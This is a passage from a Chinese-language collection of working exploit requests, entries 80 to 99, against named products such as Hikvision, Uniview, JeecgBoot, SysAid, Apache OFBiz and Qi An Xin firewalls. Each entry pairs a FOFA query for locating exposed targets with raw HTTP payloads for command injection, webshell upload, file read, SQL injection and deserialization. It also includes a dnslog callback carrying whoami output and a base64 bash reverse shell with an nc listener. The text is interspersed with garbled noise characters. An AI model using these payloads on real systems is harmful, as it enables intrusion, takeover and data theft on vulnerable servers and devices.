; ?8 a( ~( u% `6 [$ XGET /goform/webRead/open/?path=|id HTTP/1.1
' z/ t( |3 D; Z+ M5 \Host:IP( A; Y) a$ v8 ?3 m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.04 w5 {- k6 L% ?9 L
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
3 @! c3 L" ^* p# m" {7 X4 A- DAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: @2 ?! D% a* d( I3 Y) w
Accept-Encoding: gzip, deflate
0 [' t7 S3 u$ a& E& ~* _Connection: close
$ Z1 p4 W9 H( X; YUpgrade-Insecure-Requests: 1 b- X) n* c4 ^1 T& e/ j7 [
2 D' U/ P% }7 t( H: h/ M
- |, a2 D( k7 g8 v/ ]3 S80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传 `$ N8 q- y" p# r& t
FOFA:app="速达软件-公司产品"
, H3 r# t; c* _% SPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.12 B6 c( {' s8 \. B/ D# Y
Host: x.x.x.x: p' [: u8 Z- n& n! f3 D$ ] m1 F
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
! Q' g+ V9 N6 [Content-Length: 270 C' _8 x- {* y4 ^' u
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.83 y7 x1 ?9 i6 R) V5 b/ Y6 O2 O
Accept-Encoding: gzip, deflate3 J) I4 d' E u, A- P$ M$ I
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% m, V8 b6 I5 z x: F
Connection: close% r2 r0 i2 r$ s, V- G- c1 d
Content-Type: application/octet-stream
( |: D3 E" @, u9 Y) ^Upgrade-Insecure-Requests: 1
( z6 ^; y s* a! |9 ]3 n3 t+ c) z6 o. Y6 T/ d
<% out.print("oessqeonylzaf");%>
0 \ \4 B) N o8 |2 T7 |8 D: V, I7 I `0 y. X3 n. r
6 `2 I# U2 R" SGET /xykqmfxpoas.jsp HTTP/1.1
& L/ n2 ~3 w2 a7 Q7 o+ |5 a% V- f& ~- YHost: x.x.x.x1 I: u/ e+ V1 B/ m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 f& C( Z7 x1 l4 }3 y4 O
Connection: close! Z' L, k6 Q4 ?& L; h6 ]3 l
Accept-Encoding: gzip
8 v; E/ K9 s( x H/ J
- K1 E: o+ O( e! t
- @) f7 G" R$ J* ^! Z* g81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露$ m$ A3 y% Q$ v) i8 r& s
FOFA:app="uniview-视频监控"
) n' o1 F* H6 m3 `/ H/ Z* jGET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
! N) Y% e7 s. `: GHost: x.x.x.x
: x) f( c( ]; sUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.153 {5 j( [* h2 s$ a
Connection: close
, d# J) N. ]4 {Accept-Encoding: gzip7 Z$ Z4 E& S: @: T" h# U& A. g
4 R" e8 q4 [ b1 n1 K3 l( x3 w
* i3 |$ W ^; T& l* E7 u- M82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行. H, }( l+ n, \
FOFA:app="思福迪-LOGBASE"
: K/ z8 A t( Q& E; ]6 tPOST /bhost/test_qrcode_b HTTP/1.13 D/ A2 |+ |# n4 u& H
Host: BaseURL; D5 A+ S# p4 b' P( {! Y, o" L/ ]4 p
User-Agent: Go-http-client/1.1) o3 q$ A1 k! I/ Y3 I# y7 U/ m- F9 t0 N
Content-Length: 23
. i f( a( a( w, K2 ~9 @" p- U [8 K/ IAccept-Encoding: gzip
& n/ V$ T- G+ J MConnection: close
' y% ^4 M! l; i' r& ^3 [Content-Type: application/x-www-form-urlencoded
8 {$ ^2 Z3 t4 S# r" A ?( \* tReferer: BaseURL: p1 \# s$ ]" t
8 I" L( t/ I G5 y/ e1 U# @ @3 y
z1=1&z2="|id;"&z3=bhost
+ y( @4 U' t7 z
5 f$ P- X# T! i* q+ A0 @+ `# H: u1 l. I* v% S0 B$ C
83. JeecgBoot testConnection 远程命令执行
: J* B- A7 |4 C' u. r' z" t" e/ pFOFA:title=="JeecgBoot 企业级低代码平台"
% M' k2 e8 d& {' D0 T/ N- x' F
9 |- U# {2 P% ]( v. b$ ~2 A5 o8 d
POST /jmreport/testConnection HTTP/1.1& D6 z# f0 S! A: }) C' l$ _7 Q
Host: x.x.x.x
1 o8 @+ L& B2 ^ F& b5 jUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 l, }5 j! [/ i a! e X' @. [- h, W
Connection: close
4 I9 z2 F- v" f" l- C+ [4 U* I/ SContent-Length: 8881
3 l* c) V$ M( z4 F0 [ X7 ^Accept-Encoding: gzip; n0 }: j: L7 B' ~
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"& ]# e$ A9 Y. {, b0 E- p% \3 e. k
Content-Type: application/json
+ I6 x; e( @3 u
6 c2 R; z: Z% A1 _$ E- ^' M0 OPAYLOAD
9 _6 w# ^- [" u0 t% [3 e6 l5 d$ a
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
3 T! @7 m2 B2 w; eFOFA:title=="JeecgBoot 企业级低代码平台"
4 ?5 d; l& |0 l+ G' i! }$ T8 r4 K6 P
( W+ d4 D8 g+ o. ]& G d; o* f" J% P* b( F; I( q' Z
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1% ]2 y, ]' X w' `, k) {
Host: 192.168.40.130:8080
; G$ E/ X% u. b$ H8 xUser-Agent: curl/7.88.11 q f8 f+ j! c% [* T+ `
Content-Length: 156
. v6 o, ]. i0 x" w; v5 j j' [' u% zAccept: */*$ L: [4 a( |' \/ y$ I2 ?. H( [! v
Connection: close! B7 s2 u1 i+ l s& ]
Content-Type: application/json# K+ k0 ?6 R: G6 x0 @0 P
Accept-Encoding: gzip
" y2 a6 o8 V: N; _+ U4 v$ } I# X! B0 T/ B
{! _5 t+ M4 q' t3 F7 h
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
& q; h4 Z- q# s5 z" O "type": "0"
: i1 _+ l9 C3 x* j6 _8 f}
2 K+ C+ P& f5 W6 g2 ?0 _9 s# e$ R! \; g
, S% z8 f* U5 i8 g5 w( o) U85. SysAid On-premise< 23.3.36远程代码执行
0 l. U- i# {4 b# ZCVE-2023-47246' |" w. Z+ H2 t
FOFA:body="sysaid-logo-dark-green.png"
& g! d$ l! h( S9 k% wEXP数据包如下,注入哥斯拉马3 |% o7 S7 Z6 p& n) B; t' }& n
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
8 \& x) t" a: P% T2 MHost: x.x.x.x: p* @. L. |" a# |# ~) I" s* V
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
) N5 |* I8 e. T# d iContent-Type: application/octet-stream6 W A! X/ i1 ~' {2 B
Accept-Encoding: gzip2 y; V4 E% H( O' b. b6 P o
. U' i5 X1 |# `7 }: j
PAYLOAD
" I, k# o3 \. u2 o4 P
, p' ]# a/ ?/ X8 u9 k$ C2 V回显URL:http://x.x.x.x/userfiles/index.jsp
9 g! d1 o! k- y3 o: @9 o- U- B* G3 d5 E& V
86. 日本tosei自助洗衣机RCE
J2 w7 M6 J1 e# j" S5 {FOFA:body="tosei_login_check.php"
# M) g# P1 r$ w% F: ZPOST /cgi-bin/network_test.php HTTP/1.1& |+ ~% g" o6 I( f/ |# `: P
Host: x.x.x.x
; P7 A+ L: o, O; R+ G; nUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
, Q. s, q1 q8 t5 A" ?Connection: close. Z3 y P' [/ |2 C
Content-Length: 44
9 q; x% [& X7 H, U' aAccept: */*0 E" f6 L0 I. w, m% @7 Y; v2 A
Accept-Encoding: gzip! s& T4 ?. g0 Y" r1 g) G
Accept-Language: en
! a$ Y/ M4 I" h. L8 `# F mContent-Type: application/x-www-form-urlencoded+ x- g! f1 J5 w! R
; W1 F% h; f$ b& h. C4 ]host=%0acat${IFS}/etc/passwd%0a&command=ping
/ N- k- y) Y% [, b5 `1 ]* T/ n7 }" Q
" t8 J6 z' z" @1 G
87. 安恒明御安全网关aaa_local_web_preview文件上传
' z% T) y7 }- J: @" sFOFA:title="明御安全网关"' K5 b2 q' E& {: j
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
H$ g8 k, {2 H5 AHost: X.X.X.X" N- n) x" x/ D" l/ ~- F
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+ Y7 q) N5 E9 {: C% v& W1 K& MConnection: close$ ?6 o9 Z; b6 a0 H. i; W
Content-Length: 198$ Z. Y1 I' J j1 L* M( {! }8 t
Accept-Encoding: gzip1 m% n+ t6 N& O
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
2 o1 M7 y# o; ~+ a
' \4 \6 W+ a/ @8 w/ m6 R--qqobiandqgawlxodfiisporjwravxtvd
4 j. E0 f1 o$ EContent-Disposition: form-data; name="123"; filename="9B9Ccd.php"! @ L* W, P5 g3 h6 c% D. k
Content-Type: text/plain: d+ u* O7 |1 C2 j/ s6 j
& G% s: ?# R0 L4 b& T5 [
2ZqGNnsjzzU2GBBPyd8AIA7QlDq% Q! Z5 L2 U3 M6 w4 s
--qqobiandqgawlxodfiisporjwravxtvd--/ z8 f {8 t/ x4 j7 f* Y1 B9 n* E
5 d T7 u+ |/ |& x& z" Q
+ u) |( W; h; Y4 O6 b" h1 H% e" Q
/jfhatuwe.php7 R" C% U- z! n1 B0 P
: o/ y* C7 V) w! P; H88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
. a8 x9 C5 j1 ]8 ]2 g2 [FOFA:title="明御安全网关"( S# i0 d9 t4 y J* r, S
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
! D+ s$ P$ I1 s+ Z. w5 jHost: x.x.x.xx.x.x.x
; Y( `' \6 s. A& A( E RUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' F+ c& N% }$ N
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.82 i7 @6 d$ v: a
Accept-Encoding: gzip, deflate! H# y4 R/ B, m0 m6 {8 d
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% R' s& R( p, b; X# VConnection: close3 j1 y8 m: N1 d8 }: z" A; I; e1 |
6 ^6 a3 A6 W1 j& W) e6 h2 q
) W9 U+ H3 ~/ h- f, i* l+ w/astdfkhl.php
7 G, V8 V! r- K- ?' D* |; G1 c2 \5 n L! e) f; @8 ^$ e* p( y. f
89. 致远互联FE协作办公平台editflow_manager存在sql注入
& ]" ^- ?! d& D' iFOFA:title="FE协作办公平台" || body="li_plugins_download"8 M5 B. Z; n; |/ _/ m
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
" |! @1 e/ g9 E8 c/ G% {; \Host: x.x.x.x4 z( i% V/ @: |* X/ U+ C* }
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
% H: @# d4 E) w6 ~2 o# A$ V, d+ yConnection: close
" v6 [* v; q( G- e) g/ [) l4 [Content-Length: 41' e" \% g& P% H \6 h- J( t
Content-Type: application/x-www-form-urlencoded* B6 Q, E# U, y$ ]& w
Accept-Encoding: gzip
. e+ X4 ]0 w! F9 u2 h
4 G7 [, g+ l, h+ p8 s+ d/ ^option=2&GUID=-1'+union+select+111*222--+
# ?% [0 N: C; W, n
" E8 ]3 o- V/ _ H+ B" x1 _2 Y- J H& D( S+ W' M$ |0 h( i. t
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
! Y0 ^# h/ p6 A4 s. I" i! T* CFOFA:icon_hash="-1830859634"
; b+ `+ Q+ q3 W, `* a$ {POST /php/ping.php HTTP/1.1/ k0 P: M G7 t# P* R2 S
Host: x.x.x.x4 ~6 b; n9 g' S" o! y+ \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
9 p+ |# D# k& p% x* Z S9 MContent-Length: 51+ Z( ?, E# l5 I9 |
Accept: application/json, text/javascript, */*; q=0.01
' {2 x. j9 K) F7 i5 L: P4 S1 PAccept-Encoding: gzip, deflate
3 B `" v5 D! o* MAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
j$ j; t8 g, e2 H& QConnection: close7 c8 U% I6 |5 X2 ^ s7 B7 [( L
Content-Type: application/x-www-form-urlencoded$ p G) |' T8 ?
X-Requested-With: XMLHttpRequest5 y# o3 g0 {6 B; B
7 U7 T" R* a: bjsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
8 d+ ` X' Z% D: J$ [7 l1 E* N
5 c& B( ~4 p# b2 O3 i
1 ~: r6 }' W" L$ c6 |! u91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
+ C* B5 J8 K% ^FOFA:title="综合安防管理平台"0 ?) y1 K0 k' n. Y+ o
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1- g4 p F3 |7 N/ @
Host: your-ip P3 `+ J. u! s! p0 _0 [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.369 z L* z- h' e/ }* U
Accept-Encoding: gzip, deflate) R8 b' `: W' l
Accept: */*+ S5 M$ R: p, c' I
Connection: keep-alive
; B, @4 X0 d9 b% [- x1 ?6 H+ j& I g4 F
9 d5 r* q: ]4 I' A) D, q! `4 f. m4 h- z$ k- d1 m. ]
92. 海康威视运行管理中心session命令执行
! ^/ I- t9 v0 M* {$ R6 v9 P/ u7 TFastjson命令执行
6 h+ _1 j4 y. ehunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"2 J5 |1 c6 O5 f Q3 E
POST /center/api/session HTTP/1.16 {7 z7 O- U8 X( h7 [
Host:/ H6 `% A% }# b% f
Accept: application/json, text/plain, */*
; _, V: O/ N) `Accept-Encoding: gzip, deflate1 @: z4 `) I! R, E& r; j
X-Requested-With: XMLHttpRequest, |0 r! }' I$ y2 z' Y- _) Y
Content-Type: application/json;charset=UTF-8
2 j) `/ v* ^" v$ W* L9 fX-Language-Type: zh_CN
' o! [7 n3 {8 G( _8 z+ t2 oTestcmd: echo test( I9 [. Y. U( M$ o& x9 T% ]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36/ p6 H5 L- l1 G. U, w# }( w9 Q
Accept-Language: zh-CN,zh;q=0.99 [% I% F" A. o1 r x3 @0 Z
Content-Length: 5778
; {- f0 ^) p3 b4 T$ v* o" u4 J Y
PAYLOAD
/ l% [# D% U% E' x9 V( P/ S0 V
, o5 b A9 n9 \) x2 Z2 Q
0 i m% P9 |9 V: Q93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
; P$ b/ x/ c/ q$ xFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="8 z1 [8 S! U: F2 J3 g. w
POST /?g=app_av_import_save HTTP/1.18 r- P$ y; L# h7 |- W* L% I( ?
Host: x.x.x.x7 k! M( N6 t T" s, p- F! I
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx9 L0 b/ v) p9 c, ?) }1 H
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.367 s+ J6 \' o$ j: S$ d4 r
2 |& p) G6 E) |------WebKitFormBoundarykcbkgdfx
* m2 u) Z% h. ?Content-Disposition: form-data; name="MAX_FILE_SIZE"
( W7 |. Q e2 U1 h* K
8 m+ C r, B2 b! ~% p# p10000000: `' C$ `. O+ _- f2 ^! G( [
------WebKitFormBoundarykcbkgdfx5 c2 E& Y4 h z
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
+ Q) Q( N/ [% r# n7 cContent-Type: text/plain
+ q( X7 j. E$ W7 t! U3 }' X
& _. ?5 g( `" t$ kwagletqrkwrddkthtulxsqrphulnknxa s3 y/ q- d8 D& A. H
------WebKitFormBoundarykcbkgdfx3 u0 n& {% e+ Q/ H+ C0 T
Content-Disposition: form-data; name="submit_post"
& L% z; O% m: L8 s. ?
/ }# I5 Z+ o% ?& ?- kobj_app_upfile
4 P3 j! E" Q0 a3 R( ]------WebKitFormBoundarykcbkgdfx8 o) X0 d$ W9 i1 C- F
Content-Disposition: form-data; name="__hash__"
7 {/ }2 K. x: W' z5 {. {" u8 g9 e
9 j1 B" x! J; b5 D* h7 n0b9d6b1ab7479ab69d9f71b05e0e9445
1 P0 a! J- v6 _# V/ P' w/ P------WebKitFormBoundarykcbkgdfx--
' X7 o2 L V2 B' u {3 W6 ^) t, T' u1 w! I/ `4 v# E8 x
5 h* H5 l0 w5 f
GET /attachements/xlskxknxa.txt HTTP/1.1
* ^# Y/ y) Z' N6 r; ?6 ?1 P5 u) ^Host: xx.xx.xx.xx
8 c9 t4 x) F" m" I# F2 s- T$ V, TUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
, Q. o2 \1 ^1 M! ~/ m T
* N0 _2 o" H* o" ^' c b+ ~: u* X& g6 e
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传$ j( I+ ~/ `+ L9 w4 }9 w4 w+ Z
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="" I; q# \6 @3 C j
POST /?g=obj_area_import_save HTTP/1.12 K4 `6 g. [" O* I# i% u( b v
Host: x.x.x.x
0 x# u+ j% Q# c1 ]+ KContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt* \' D3 ]% {) }7 `+ P9 Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.364 T( Q( E1 u0 V5 [5 J* ]# ]
/ y( ?1 j/ H) q- H
------WebKitFormBoundarybqvzqvmt
! g \; E) i/ Z) kContent-Disposition: form-data; name="MAX_FILE_SIZE") Z* `, \" x9 H1 C+ _; ~/ O
# S9 }; N4 f% z( D4 p8 ], A1 W2 i10000000
/ I/ W* P7 i! r------WebKitFormBoundarybqvzqvmt
" h7 @/ T9 O+ A: w$ mContent-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"5 F* _, s- z, _) _5 g' _7 x
Content-Type: text/plain r* R! F. r2 h
* h' g0 N5 |1 T+ ]. t q/ bpxplitttsrjnyoafavcajwkvhxindhmu+ H5 ?% U6 ?0 Y) x+ A
------WebKitFormBoundarybqvzqvmt. i2 |) D1 R7 [8 F' b
Content-Disposition: form-data; name="submit_post"
; n4 V% _+ ~4 M3 E. I6 f+ |1 a
% O0 H; E, ~0 U7 j Uobj_app_upfile
: u2 t/ N8 N* Q7 i( u+ u------WebKitFormBoundarybqvzqvmt
: D2 r' `% R* E; F: iContent-Disposition: form-data; name="__hash__"! g# s9 }/ P( e/ c
5 F( J$ C5 Q" y O/ x1 A4 x0b9d6b1ab7479ab69d9f71b05e0e94457 D$ A# x1 p F8 e& j8 n. M/ \- [) }
------WebKitFormBoundarybqvzqvmt--$ S: T- b" N2 I8 y
: g2 @, m1 O5 M
9 Z% r! c$ s( a. d- V0 j
: _) a2 }" x. i/ ^GET /attachements/xlskxknxa.txt HTTP/1.1* U- p/ l! s! [9 g
Host: xx.xx.xx.xx' b( A3 u, H' i! `- L
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
6 L4 b: v' w2 ?
$ L. [ X( Q/ `+ w
+ g& X7 y2 C( f, u: j% Z( Z, ~' x6 N/ n" ]2 \; B1 G: D6 `
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
5 s5 ]9 q9 p; w/ ]. QCVE-2023-49070( v2 Y3 }5 n% _' T0 z
FOFA:app="Apache_OFBiz": ]+ ?3 t2 y6 b: I" G
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
7 {* l2 C1 j ?' @Host: x.x.x.x
q; a7 `1 u3 Q' K$ ~9 \3 T- dUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.361 ?' P% u; Y( P
Connection: close5 ~) |, [( l& U' N( ~1 ]
Content-Length: 8894 o6 A2 V! O/ k
Content-Type: application/xml
# G0 y! Y+ S* u, r+ E% C s9 sAccept-Encoding: gzip& G& t! i* \# A$ H" c2 J5 \
6 P0 p* b1 `' `* X2 T
<?xml version="1.0"?> P: ?7 g4 i1 F {$ d
<methodCall>" z. E% P! k1 d* O
<methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
- @! J0 ? h( s' o( L( X3 `% }- y3 d9 ` <params>4 c/ x- e& {( A$ D
<param>
1 K! ]7 E- z: F: y9 u# I <value>: X, N( V3 n$ H- Q3 D: ]* K1 x% }8 m
<struct>
7 {9 {; G; D& s% v4 ~ <member>* [* f) i$ x `/ ^/ {* p! Z
<name>test</name>! k1 R# i9 Z5 @5 [ w3 b
<value>( c0 d- i) h& h9 P) d/ b# \9 Z w
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
, L0 O; S8 o: o* Q- m$ a </value>
6 z4 |$ _2 s' T </member>/ K$ Q. K) Q/ q
</struct>
( t5 c* v$ [5 y9 F+ ]( S9 F2 D2 C7 i </value>) ?7 `6 X% K7 x1 K: ~0 c: z
</param>
+ y' u6 A K5 b7 J- r' @0 M# i; J# J2 S </params>
8 }- E. x. J8 t; z; f' w. X! \5 p7 Q</methodCall>
0 d- M5 C9 K& W
( L8 F1 f/ d, g5 r- s5 F. o/ _* p4 \
用ysoserial生成payload
& x! p, e0 p4 T0 A3 fjava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
& R: D3 o& D; T9 O
/ R: E# f+ x$ ^; K9 g- P. m% Y6 F0 P- ?/ j* v; {
将生成的payload替换到上面的POC
$ p' j8 l$ ]+ l" o, w- n4 GPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1, h8 k8 @, ~. r2 U5 m' @* N# s
Host: 192.168.40.130:8443
$ {5 E4 l) D" A" l% n' d4 YUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
" ]% H2 [: G' g% WConnection: close: G' |9 e. t! g7 Z" \+ P k3 [" N
Content-Length: 8892 d0 r$ Y. N" u+ V0 N) F/ z
Content-Type: application/xml3 G3 B- r6 c+ v, D
Accept-Encoding: gzip: y* S, @# @& K
1 i2 `; D/ ~+ b! H* r. O U0 d
PAYLOAD( \0 k8 d2 s; `5 k e- D
- _; p, y$ P' j96. Apache OFBiz 18.12.11 groovy 远程代码执行
8 H# T' i- `" X: E- l# KFOFA:app="Apache_OFBiz"
9 T. ?+ ]3 q% c# yPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
& q) z9 _/ Q! ?1 p0 t9 A+ H- O; LHost: localhost:8443
. l- q1 K8 p! z( y3 Z# ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0- o7 G- c/ k, o& ^
Accept: */*
4 H3 }* k' c9 g& p! X' ^ RAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* W6 B4 |. U3 D9 p, i
Content-Type: application/x-www-form-urlencoded
( a. L" L9 e( `5 Z: V' O" X6 h7 [$ mContent-Length: 55
7 W3 G( [6 F3 n( F( q3 O
& {' @0 d% i, c# MgroovyProgram=throw+new+Exception('id'.execute().text);4 M+ i7 d- h* |. g r$ D! O
2 Z! d0 \# {+ r0 F2 g
$ [7 M, w- w& B/ R; b反弹shell$ R [6 _8 h1 ~ i
在kali上启动一个监听) @+ v' E* y1 V6 P- A; a& H
nc -lvp 77778 J) a" V+ ~: l; y) W
- ]8 d# d, n* C( fPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1; B2 p/ a$ Y+ S" d9 w1 E# R* v
Host: 192.168.40.130:8443
0 _& N! a( [4 n5 M' C# i7 s1 WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0+ M! s! j6 ^. f3 ^
Accept: */*
' G2 A. v/ Q& s7 R8 e* YAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! G3 C z6 J% F0 D2 P# W1 s1 LContent-Type: application/x-www-form-urlencoded' f% n2 [) _3 v4 J I
Content-Length: 71
T3 A" s: ^, A1 ?. I( l' A8 L8 k1 S% M9 k0 A) g+ @
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
# V3 ? C' t' J" z: D9 g5 D# ? m% `3 ]/ ^7 H4 B x: B
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
$ Y; y6 j0 G) aFOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
/ a. V+ n' i% A! B7 o3 P5 WGET /passport/login/ HTTP/1.1
( G W- V0 }* F5 s% k. HHost: 192.168.40.130:8085
! I5 v0 l4 p% J. G9 z; E! BUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
" O5 B" E) p/ y! a) H% WAccept-Encoding: gzip& A- c3 i% u! e3 R
Connection: close
& A4 v" l8 R7 @; o* M$ {Cookie: rememberMe=PAYLOAD
" \/ l& h6 j+ R- \; @. IX-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
, A- J: w% {! M$ K2 @9 ^8 Y) W) |# L
( `3 A' _5 E2 z; Q5 I9 W, ~) I" H, S u- N+ o2 P
98. SpiderFlow爬虫平台远程命令执行. h; M) D3 W/ o2 Q+ {' [5 B
CVE-2024-0195* G9 o, g, C. K( @# Z
FOFA:app="SpiderFlow"
2 G4 i5 F. N' n: t" f( QPOST /function/save HTTP/1.1+ N9 g6 z% f6 n9 [) l! `# S& J
Host: 192.168.40.130:8088
* D, V* E6 l8 Q ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.00 p5 k' J% A1 P9 `
Connection: close9 C) U% \5 g8 `- { k, g
Content-Length: 121
) {/ x( N0 X& ^' B) JAccept: */*, R; @$ G% n9 I1 L. `8 t
Accept-Encoding: gzip, deflate
8 v7 e' N6 O0 P! H# l. |Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 m% N2 p( I; Y, f3 ~4 zContent-Type: application/x-www-form-urlencoded; charset=UTF-8
( i0 X# P2 s9 Y SX-Requested-With: XMLHttpRequest
' i# O! K- n2 x8 u4 W, i2 f) `: M; \" Z$ I
id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B4 d0 m* S8 g( j* D8 d' M+ p3 W
0 B& T8 }! i- \, k
/ R3 U- O8 w! F4 o- n" h- e
99. Ncast盈可视高清智能录播系统busiFacade RCE
4 z) R1 C z0 e" g, k7 @3 T2 eCVE-2024-0305
